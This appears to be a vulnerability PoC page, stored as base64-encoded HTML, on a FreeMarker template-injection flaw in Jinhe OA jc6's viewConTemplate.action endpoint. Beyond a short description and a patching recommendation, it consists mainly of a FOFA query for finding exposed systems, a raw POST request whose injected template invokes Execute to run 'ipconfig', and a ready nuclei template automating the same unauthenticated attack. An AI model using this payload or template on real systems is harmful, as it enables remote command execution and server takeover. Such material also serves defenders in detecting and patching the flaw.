金和OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞

PGgxPjxhIG5hbWU9IumHkeWSjE9BIGpjNiB2aWV3Q29uVGVtcGxhdGUuYWN0aW9u5a2Y5ZyoRnJlZU1hcmtlcuaooeadv+azqOWFpea8j+a0niI+PC9hPjxzcGFuPjwvc3Bhbj7ph5HlkoxPQSBqYzYgdmlld0NvblRlbXBsYXRlLmFjdGlvbuWtmOWcqEZyZWVNYXJrZXLmqKHmnb/ms6jlhaXmvI/mtJ48L2gxPjxoMj48YSBuYW1lPSLmvI/mtJ7mj4/ov7AiPjwvYT48c3Bhbj48L3NwYW4+5ryP5rSe5o+P6L+wPC9oMj48cD7ph5HlkoxPQS1qYzYtdmlld0NvblRlbXBsYXRlLmFjdGlvbuaOpeWPo+WtmOWcqEZyZWVNYXJrZXLmqKHmnb/ms6jlhaXmvI/mtJ7vvIzmnKrnu4/ouqvku73pqozor4HnmoTmlLvlh7vogIXlj6/ku6XliKnnlKjmraTmvI/mtJ7ov5znqIvku6PnoIHmiafooYzjgIHlhpnlhaXlkI7pl6jmlofku7bvvIzlr7zoh7TmnI3liqHlmajlrZjlnKjooqvmjqfnmoTpo47pmanjgII8L3A+CjxoMj48YSBuYW1lPSLkuqflk4HnlYzpnaIiPjwvYT48c3Bhbj48L3NwYW4+5Lqn5ZOB55WM6Z2iPC9oMj48cD48aW1nIHNyYz0iaHR0cHM6Ly9uYzAuY2RuLnprYXEuY24vbWQvMjEyMTIvZTg4ZjM3MWRlYWU5Y2Q5ZjExYTFkMzI4ODE5OTcxYzZfODcyMTcucG5nIiBhbHQ9IiI+PC9wPgo8aDI+PGEgbmFtZT0iZm9mYeivreazlSI+PC9hPjxzcGFuPjwvc3Bhbj5mb2Zh6K+t5rOVPC9oMj48cD48Y29kZT5ib2R5PSIvamM2L3BsYXRmb3JtL2luZGV4L3N0eWxlcyI8L2NvZGU+PC9wPgo8aDI+PGEgbmFtZT0iUE9DIj48L2E+PHNwYW4+PC9zcGFuPlBPQzwvaDI+PHByZT48b2w+PGxpPjxjb2RlPjxzcGFuPlBPU1QgPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+amM2PC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+cGxhdGZvcm08L3NwYW4+PHNwYW4+Lzwvc3Bhbj48c3Bhbj5wb3J0YWx3Yjwvc3Bhbj48c3Bhbj4vPC9zcGFuPjxzcGFuPnBvcnRhbHdiPC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+Y29uPC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+dGVtcGxhdGU8L3NwYW4+PHNwYW4+ITwvc3Bhbj48c3Bhbj52aWV3Q29uVGVtcGxhdGU8L3NwYW4+PHNwYW4+Ljwvc3Bhbj48c3Bhbj5hY3Rpb24gSFRUUDwvc3Bhbj48c3Bhbj4vPC9zcGFuPjxzcGFuPjEuMTwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+SG9zdDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPkFjY2VwdDwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPkVuY29kaW5nPC9zcGFuPjxzcGFuPjo8L3NwYW4+PHNwYW4+IGd6aXA8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPkNvbnRlbnQ8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj5UeXBlPC9zcGFuPjxzcGFuPjo8L3NwYW4+PHNwYW4+IGFwcGxpY2F0aW9uPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+eDwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPnd3dzwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPmZvcm08L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj51cmxlbmNvZGVkPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+bW9kdUlkPC9zcGFuPjxzcGFuPj08L3NwYW4+PHNwYW4+MTwvc3Bhbj48c3Bhbj4mYW1wOzwvc3Bhbj48c3Bhbj5jb2RlPC9zcGFuPjxzcGFuPj0lPC9zcGFuPjxzcGFuPjI1M0NjbG9iPC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+MjUzRTwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI1MjQ8L3NwYW4+PHNwYW4+JTwvc3Bhbj48c3Bhbj4yNTdCPC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+MjUyMmZyZWVtYXJrZXI8L3NwYW4+PHNwYW4+Ljwvc3Bhbj48c3Bhbj50ZW1wbGF0ZTwvc3Bhbj48c3Bhbj4uPC9zcGFuPjxzcGFuPnV0aWxpdHk8L3NwYW4+PHNwYW4+Ljwvc3Bhbj48c3Bhbj5FeGVjdXRlPC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+MjUyMjwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI1M0ZuZXc8L3NwYW4+PHNwYW4+JTwvc3Bhbj48c3Bhbj4yODwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI5PC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+Mjg8L3NwYW4+PHNwYW4+JTwvc3Bhbj48c3Bhbj4yNTIyaXBjb25maWc8L3NwYW4+PHNwYW4+JTwvc3Bhbj48c3Bhbj4yNTIyPC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+Mjk8L3NwYW4+PHNwYW4+JTwvc3Bhbj48c3Bhbj4yNTdEPC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+MjUzQzwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI1MkZjbG9iPC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+MjUzRTwvc3Bhbj48c3Bhbj4mYW1wOzwvc3Bhbj48c3Bhbj51dWlkPC9zcGFuPjxzcGFuPj08L3NwYW4+PHNwYW4+MTwvc3Bhbj48L2NvZGU+PC9saT48L29sPjwvcHJlPjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC8yMTIxMi9iOGVmMWZlYzg5YWNlMWQzYWUxM2IzY2FkZmRmZjBlYV80NDI3My5wbmciIGFsdD0iIj48L3A+CjxoMj48YSBuYW1lPSJudWNsZWnpqozor4EiPjwvYT48c3Bhbj48L3NwYW4+bnVjbGVp6aqM6K+BPC9oMj48cHJlPjxvbD48bGk+PGNvZGU+PHNwYW4+aWQ8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gamluaGU8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj5PQTwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPmpjNjwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPnZpZXdDb25UZW1wbGF0ZTwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPlJDRTwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPmluZm88L3NwYW4+PHNwYW4+Ojwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICBuYW1lPC9zcGFuPjxzcGFuPjo8L3NwYW4+PHNwYW4+IDwvc3Bhbj48c3Bhbj7ph5Hlkow8L3NwYW4+PHNwYW4+T0EgamM2IHZpZXdDb25UZW1wbGF0ZTwvc3Bhbj48c3Bhbj4uPC9zcGFuPjxzcGFuPmFjdGlvbjwvc3Bhbj48c3Bhbj7lrZjlnKg8L3NwYW4+PHNwYW4+RnJlZU1hcmtlcjwvc3Bhbj48c3Bhbj7mqKHmnb/ms6jlhaXmvI/mtJ48L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgYXV0aG9yPC9zcGFuPjxzcGFuPjo8L3NwYW4+PHNwYW4+IG5vYm9keTwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICBzZXZlcml0eTwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiBjcml0aWNhbDwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICBkZXNjcmlwdGlvbjwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+fDwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgIDwvc3Bhbj48c3Bhbj7ph5Hlkow8L3NwYW4+PHNwYW4+T0E8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj5qYzY8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj52aWV3Q29uVGVtcGxhdGU8L3NwYW4+PHNwYW4+Ljwvc3Bhbj48c3Bhbj5hY3Rpb248L3NwYW4+PHNwYW4+5o6l5Y+j5a2Y5ZyoPC9zcGFuPjxzcGFuPkZyZWVNYXJrZXI8L3NwYW4+PHNwYW4+5qih5p2/5rOo5YWl5ryP5rSe77yM5pyq57uP6Lqr5Lu96aqM6K+B55qE5pS75Ye76ICF5Y+v5Lul5Yip55So5q2k5ryP5rSe6L+c56iL5Luj56CB5omn6KGM44CB5YaZ5YWl5ZCO6Zeo5paH5Lu277yM5a+86Ie05pyN5Yqh5Zmo5a2Y5Zyo6KKr5o6n55qE6aOO6Zmp44CCPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gIGltcGFjdDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+fDwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgIDwvc3Bhbj48c3Bhbj7mnKrnu4/ouqvku73pqozor4HnmoTmlLvlh7vogIXlj6/ku6XliKnnlKjmraTmvI/mtJ7ov5znqIvku6PnoIHmiafooYw8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgcmVtZWRpYXRpb248L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPnw8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICA8L3NwYW4+PHNwYW4+5Y2H57qn54mI5pys77yM5omT6KGl5LiBPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gIG1ldGFkYXRhPC9zcGFuPjxzcGFuPjo8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICB2ZXJpZmllZDwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiA8L3NwYW4+PHNwYW4+dHJ1ZTwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgIG1heDwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPnJlcXVlc3Q8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPjM8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICBmb2ZhPC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+cXVlcnk8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gYm9keTwvc3Bhbj48c3Bhbj49PC9zcGFuPjxzcGFuPiIvamM2L3BsYXRmb3JtL2luZGV4L3N0eWxlcyI8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgdGFnczwvc3Bhbj48c3Bhbj46PC9zcGFuPjxzcGFuPiBPQTwvc3Bhbj48c3Bhbj4sPC9zcGFuPjxzcGFuPnJjZTwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPnJlcXVlc3RzPC9zcGFuPjxzcGFuPjo8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgPC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+IHJhdzwvc3Bhbj48c3Bhbj46PC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gICAgICA8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPnw8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjxzcGFuPiAgICAgICAgUE9TVCA8L3NwYW4+PHNwYW4+Lzwvc3Bhbj48c3Bhbj5qYzY8L3NwYW4+PHNwYW4+Lzwvc3Bhbj48c3Bhbj5wbGF0Zm9ybTwvc3Bhbj48c3Bhbj4vPC9zcGFuPjxzcGFuPnBvcnRhbHdiPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+cG9ydGFsd2I8L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj5jb248L3NwYW4+PHNwYW4+LTwvc3Bhbj48c3Bhbj50ZW1wbGF0ZTwvc3Bhbj48c3Bhbj4hPC9zcGFuPjxzcGFuPnZpZXdDb25UZW1wbGF0ZTwvc3Bhbj48c3Bhbj4uPC9zcGFuPjxzcGFuPmFjdGlvbiBIVFRQPC9zcGFuPjxzcGFuPi88L3NwYW4+PHNwYW4+MS4xPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gICAgICAgIDwvc3Bhbj48c3Bhbj5Ib3N0PC9zcGFuPjxzcGFuPjo8L3NwYW4+PHNwYW4+IDwvc3Bhbj48c3Bhbj57ezwvc3Bhbj48c3Bhbj5Ib3N0bmFtZTwvc3Bhbj48c3Bhbj59fTwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgICAgICA8L3NwYW4+PHNwYW4+QWNjZXB0PC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+RW5jb2Rpbmc8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gZ3ppcDwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgICAgICA8L3NwYW4+PHNwYW4+Q29udGVudDwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPlR5cGU8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gYXBwbGljYXRpb248L3NwYW4+PHNwYW4+Lzwvc3Bhbj48c3Bhbj54PC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+d3d3PC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+Zm9ybTwvc3Bhbj48c3Bhbj4tPC9zcGFuPjxzcGFuPnVybGVuY29kZWQ8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gICAgICAgIG1vZHVJZDwvc3Bhbj48c3Bhbj49PC9zcGFuPjxzcGFuPjE8L3NwYW4+PHNwYW4+JmFtcDs8L3NwYW4+PHNwYW4+Y29kZTwvc3Bhbj48c3Bhbj49JTwvc3Bhbj48c3Bhbj4yNTNDY2xvYjwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI1M0U8L3NwYW4+PHNwYW4+JTwvc3Bhbj48c3Bhbj4yNTI0PC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+MjU3Qjwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI1MjJmcmVlbWFya2VyPC9zcGFuPjxzcGFuPi48L3NwYW4+PHNwYW4+dGVtcGxhdGU8L3NwYW4+PHNwYW4+Ljwvc3Bhbj48c3Bhbj51dGlsaXR5PC9zcGFuPjxzcGFuPi48L3NwYW4+PHNwYW4+RXhlY3V0ZTwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI1MjI8L3NwYW4+PHNwYW4+JTwvc3Bhbj48c3Bhbj4yNTNGbmV3PC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+Mjg8L3NwYW4+PHNwYW4+JTwvc3Bhbj48c3Bhbj4yOTwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI4PC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+MjUyMmlwY29uZmlnPC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+MjUyMjwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI5PC9zcGFuPjxzcGFuPiU8L3NwYW4+PHNwYW4+MjU3RDwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI1M0M8L3NwYW4+PHNwYW4+JTwvc3Bhbj48c3Bhbj4yNTJGY2xvYjwvc3Bhbj48c3Bhbj4lPC9zcGFuPjxzcGFuPjI1M0U8L3NwYW4+PHNwYW4+JmFtcDs8L3NwYW4+PHNwYW4+dXVpZDwvc3Bhbj48c3Bhbj49PC9zcGFuPjxzcGFuPjE8L3NwYW4+PC9jb2RlPjwvbGk+PGxpPjxjb2RlPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gICAgbWF0Y2hlcnM8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48L2NvZGU+PC9saT48bGk+PGNvZGU+PHNwYW4+ICAgICAgPC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+IHR5cGU8L3NwYW4+PHNwYW4+Ojwvc3Bhbj48c3Bhbj4gZHNsPC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gICAgICAgIGRzbDwvc3Bhbj48c3Bhbj46PC9zcGFuPjwvY29kZT48L2xpPjxsaT48Y29kZT48c3Bhbj4gICAgICAgICAgPC9zcGFuPjxzcGFuPi08L3NwYW4+PHNwYW4+IHN0YXR1c19jb2RlIDwvc3Bhbj48c3Bhbj49PTwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPjIwMDwvc3Bhbj48c3Bhbj4gPC9zcGFuPjxzcGFuPiZhbXA7JmFtcDs8L3NwYW4+PHNwYW4+IGNvbnRhaW5zX2FsbDwvc3Bhbj48c3Bhbj4oPC9zcGFuPjxzcGFuPmJvZHk8L3NwYW4+PHNwYW4+LDwvc3Bhbj48c3Bhbj4iJmx0Oy9jbG9iJmd0OyI8L3NwYW4+PHNwYW4+KTwvc3Bhbj48L2NvZGU+PC9saT48L29sPjwvcHJlPjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC8yMTIxMi80NjhmMzdmMTVmZTVlZGZiMjIyZGVjNWMxOWE4MGE5ZV85MjkyMi5wbmciIGFsdD0iIj48L3A+CjxoMj48YSBuYW1lPSLkv67lpI3lu7rorq4iPjwvYT48c3Bhbj48L3NwYW4+5L+u5aSN5bu66K6uPC9oMj48dWw+CjxsaT7lu7rorq7ljYfnuqfliLDmnIDmlrDniYjmnKzmiJbmiZPooaXkuIE8L2xpPjxsaT7pnZ7lv4XopoHnpoHmraLlhaznvZHorr/pl67miJbnmb3lkI3ljZXorr/pl648L2xpPjwvdWw+